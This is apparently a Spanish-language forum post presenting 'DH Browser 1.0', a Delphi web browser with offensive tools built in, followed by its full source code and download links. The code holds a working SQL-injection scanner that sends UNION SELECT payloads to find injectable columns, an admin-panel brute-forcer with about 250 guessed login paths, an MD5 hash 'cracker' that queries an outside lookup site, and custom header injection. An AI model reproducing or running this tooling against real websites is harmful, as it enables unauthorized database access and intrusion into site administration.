- Podes ver el codigo fuente de la pagina cargado
- Se puede modificar los headers para HTTP Header Injection
- Se puede buscar palabras en el codigo fuente
- SQLI Scanner incorporado
- Admin Finder incorporado
- Crack MD5 incorporado
Una imagen :
El codigo :
Código
// DH Browser 1.0 // (C) Doddy Hackman 2016 // Credits : // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242 // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143 // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm unit dh; interface uses Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls, Vcl.OleCtrls, SHDocVw, Vcl.Imaging.pngimage, Vcl.ExtCtrls, Vcl.ComCtrls, mshtml, Vcl.Menus, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, PerlRegEx, IdMultipartFormData, Vcl.ImgList, Vcl.Styles.Utils.ComCtrls, Vcl.Styles.Utils.Menus, Vcl.Styles.Utils.SysStyleHook, Vcl.Styles.Utils.SysControls, Vcl.Styles.Utils.Forms, Vcl.Styles.Utils.StdCtrls, Vcl.Styles.Utils.ScreenTips; type TFormHome = class(TForm) gbEnterPage: TGroupBox; btnEnter: TButton; gbHeaders: TGroupBox; mmHeaders: TMemo; GroupBox3: TGroupBox; GroupBox4: TGroupBox; gbAbout: TGroupBox; txtURL: TEdit; imgLogo: TImage; imgAbout: TImage; btnSQLI_Scanner: TButton; btnAdminFinder: TButton; btnCrack_MD5: TButton; btnSearch_for_text: TButton; cbUse_This_Headers: TCheckBox; browser: TWebBrowser; status: TStatusBar; progreso: TProgressBar; mmSource: TMemo; menu: TPopupMenu; ShowSourceHTML1: TMenuItem; ShowBrowser1: TMenuItem; nave: TIdHTTP; buscar_codigo: TFindDialog; ilIconos: TImageList; lblAbout: TLabel; procedure btnEnterClick(Sender: TObject); procedure browserDownloadComplete(Sender: TObject); procedure browserProgressChange(ASender: TObject; Progress, ProgressMax: Integer); procedure ShowSourceHTML1Click(Sender: TObject); procedure ShowBrowser1Click(Sender: TObject); procedure btnSQLI_ScannerClick(Sender: TObject); procedure btnAdminFinderClick(Sender: TObject); procedure btnCrack_MD5Click(Sender: TObject); procedure btnSearch_for_textClick(Sender: TObject); procedure buscar_codigoFind(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var FormHome: TFormHome; implementation {$R *.dfm} procedure TFormHome.btnAdminFinderClick(Sender: TObject); const paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/'); var i: Integer; control: Integer; var cabeceras: OLEVariant; uno: OLEVariant; dos: OLEVariant; tres: OLEVariant; begin if not(txtURL.Text = '') then begin control := 0; status.Panels[0].Text := '[+] Finding Panel ....'; FormHome.status.Update; for i := Low(paginas) to High(paginas) do if (control = 1) then begin Abort; end else begin try status.Panels[0].Text := '[+] Testing : ' + paginas[i]; FormHome.status.Update; nave.Get(txtURL.Text + '/' + paginas[i]); if nave.ResponseCode = 200 then begin txtURL.Text := txtURL.Text + '/' + paginas[i]; uno := navNoReadFromCache or navNoWriteToCache; dos := ''; tres := ''; if (cbUse_This_Headers.Checked) then begin cabeceras := mmHeaders.Text; browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras); end else begin cabeceras := ''; browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras); end; control := 1; status.Panels[0].Text := '[+] Panel Found'; FormHome.status.Update; MessageBox(0, 'Panel Found', 'DH Browser 1.0', MB_ICONINFORMATION); Abort; end; except on E: EIdHttpProtocolException do; on E: Exception do; end; end; status.Panels[0].Text := '[-] Panel not found'; FormHome.status.Update; MessageBox(0, 'Panel not found', 'DH Browser 1.0', MB_ICONERROR); end else begin MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION); end; end; procedure TFormHome.browserDownloadComplete(Sender: TObject); var buscador: IHTMLElement; begin progreso.Position := 0; status.Panels[0].Text := '[+] Page loaded'; FormHome.status.Update; // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm begin try begin mmSource.Clear; buscador := (browser.Document AS IHTMLDocument2).body; while not(buscador.parentElement = nil) do begin buscador := buscador.parentElement; end; mmSource.Lines.Add(buscador.outerHTML); end; except // ?? end; end; end; procedure TFormHome.browserProgressChange(ASender: TObject; Progress, ProgressMax: Integer); begin progreso.Max := ProgressMax; progreso.Position := Progress; end; procedure TFormHome.buscar_codigoFind(Sender: TObject); // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143 var aca: PChar; aca2: PChar; acatoy: PChar; acatoy2: Word; begin With Sender as TFindDialog do begin GetMem(aca2, Length(FindText) + 1); StrPCopy(aca2, FindText); acatoy2 := mmSource.GetTextLen + 1; GetMem(aca, acatoy2); mmSource.GetTextBuf(aca, acatoy2); acatoy := aca + mmSource.SelStart + mmSource.SelLength; acatoy := StrPos(acatoy, aca2); if not(acatoy = NIL) then begin mmSource.SelStart := acatoy - aca; mmSource.SelLength := Length(FindText); end; mmSource.SetFocus; end; end; procedure TFormHome.btnCrack_MD5Click(Sender: TObject); var md5: string; datos: TIdMultiPartFormDataStream; code: string; regex_check: TPerlRegEx; cracked: string; begin md5 := InputBox('DH Browser 1.0', 'MD5 : ', ''); if not(md5 = '') then begin regex_check := TPerlRegEx.Create(); datos := TIdMultiPartFormDataStream.Create; datos.AddFormField('pass', md5); datos.AddFormField('option', 'hash2text'); datos.AddFormField('send', 'Submit'); status.Panels[0].Text := '[+] Cracking ...'; FormHome.status.Update; code := nave.Post('http://md5online.net/index.php', datos); regex_check.regex := '<center><p>md5 :<b>(.*?)</b> <br>pass : <b>(.*?)</b></p>'; regex_check.Subject := code; if regex_check.Match then begin cracked := regex_check.Groups[2]; status.Panels[0].Text := '[+] MD5 Cracked : ' + cracked; FormHome.status.Update; MessageBox(0, PChar('MD5 Cracked : ' + cracked), 'DH Browser 1.0', MB_ICONINFORMATION); end else begin status.Panels[0].Text := '[-] Not found'; FormHome.status.Update; MessageBox(0, 'Not found', 'DH Browser 1.0', MB_ICONERROR); end; end; end; procedure TFormHome.btnEnterClick(Sender: TObject); // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242 var cabeceras: OLEVariant; uno: OLEVariant; dos: OLEVariant; tres: OLEVariant; begin uno := navNoReadFromCache or navNoWriteToCache; dos := ''; tres := ''; if (cbUse_This_Headers.Checked) then begin cabeceras := mmHeaders.Text; browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras); end else begin cabeceras := ''; browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras); end; end; procedure TFormHome.FormCreate(Sender: TObject); begin UseLatestCommonDialogs := False; end; procedure TFormHome.btnSearch_for_textClick(Sender: TObject); begin buscar_codigo.Execute; end; procedure TFormHome.ShowBrowser1Click(Sender: TObject); begin browser.Visible := True; mmSource.Visible := False; end; procedure TFormHome.ShowSourceHTML1Click(Sender: TObject); begin browser.Visible := False; mmSource.Visible := True; end; procedure TFormHome.btnSQLI_ScannerClick(Sender: TObject); var pass1: string; pass2: string; code: string; urltest: string; urlgen: string; full: string; codedos: string; i: Integer; regex_check: TPerlRegEx; var cabeceras: OLEVariant; uno: OLEVariant; dos: OLEVariant; tres: OLEVariant; begin if not(txtURL.Text = '') then begin regex_check := TPerlRegEx.Create(); status.Panels[0].Text := '[+] SQLI Scanning ...'; FormHome.status.Update; pass1 := '+'; pass2 := '--'; urltest := 'concat(0x4b30425241,1,0x4b30425241)'; status.Panels[0].Text := '[+] Checking ...'; FormHome.status.Update; code := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2); codedos := nave.Get(txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2); if not(code = codedos) then begin status.Panels[0].Text := '[+] Finding columns number'; FormHome.status.Update; urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)'; urlgen := '1'; for i := 2 to 36 do begin status.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i); FormHome.status.Update; urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i) + ',0x4b30425241)'; urlgen := urlgen + ',' + IntToStr(i); code := nave.Get(txtURL.Text + urltest + pass2); regex_check.regex := 'K0BRA(.*?)K0BRA'; regex_check.Subject := code; if regex_check.Match then begin urlgen := StringReplace(urlgen, regex_check.Groups[1], 'hackman', []); full := txtURL.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 + urlgen; txtURL.Text := full; uno := navNoReadFromCache or navNoWriteToCache; dos := ''; tres := ''; if (cbUse_This_Headers.Checked) then begin cabeceras := mmHeaders.Text; browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras); end else begin cabeceras := ''; browser.Navigate(txtURL.Text, uno, dos, tres, cabeceras); end; status.Panels[0].Text := '[+] SQI Scanner Finished'; FormHome.status.Update; MessageBox(0, 'SQI Scanner Finished', 'DH Browser 1.0', MB_ICONINFORMATION); Abort; end; end; status.Panels[0].Text := '[-] Columns length not found'; FormHome.status.Update; MessageBox(0, 'Columns length not found', 'DH Browser 1.0', MB_ICONERROR); end else begin status.Panels[0].Text := '[-] Not vulnerable'; FormHome.status.Update; MessageBox(0, 'Not vulnerable', 'DH Browser 1.0', MB_ICONERROR); end; status.Panels[0].Text := '[+] Done'; FormHome.status.Update; end else begin MessageBox(0, 'Enter URL', 'DH Browser 1.0', MB_ICONINFORMATION); end; end; end. // The End ?
Si quieren bajar el programa lo pueden hacer de aca :
SourceForge.
Github.
Eso seria todo.